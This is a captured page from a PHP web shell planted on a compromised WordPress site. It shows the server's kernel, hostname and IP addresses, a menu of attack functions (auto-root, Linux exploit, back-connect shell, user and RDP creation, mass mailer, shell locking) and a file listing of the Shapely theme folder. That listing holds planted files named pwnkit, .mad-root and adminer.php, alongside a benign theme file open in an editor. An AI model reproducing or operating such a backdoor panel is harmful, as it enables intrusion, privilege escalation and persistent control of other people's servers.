Linux webm006.cluster131.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.131.20.6 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
8.0.30
neuschi
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
neuschi /
www /
wp-content /
themes /
shapely /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
custom-controls
[ DIR ]
drwxr-xr-x
libraries
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
class-shapely-builder.php
2.65
KB
-rw-r--r--
class-shapely-notify-system.ph...
6.87
KB
-rw-r--r--
class-shapely-related-posts.ph...
6.81
KB
-rw-r--r--
class-shapely.php
6.9
KB
-rw-r--r--
class-wp-bootstrap-navwalker.p...
7.42
KB
-rw-r--r--
customizer.php
40.2
KB
-rw-r--r--
extras.php
31.22
KB
-rw-r--r--
jetpack.php
957
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
socialnav.php
720
B
-rw-r--r--
template-tags.php
6.68
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : socialnav.php
<?php /** * Social Navigation Menu */ if ( ! function_exists( 'shapely_social_icons' ) ) : /** * Display social links in footer and widgets * * @package shapely */ function shapely_social_icons() { if ( has_nav_menu( 'social-menu' ) ) { wp_nav_menu( array( 'theme_location' => 'social-menu', 'container' => 'nav', 'container_id' => 'social', 'container_class' => 'social-icons', 'menu_id' => 'menu-social-items', 'menu_class' => 'list-inline social-list', 'depth' => 1, 'fallback_cb' => '', 'link_before' => '<i class="social_icon fa"><span>', 'link_after' => '</span></i>', ) ); } } endif;
Close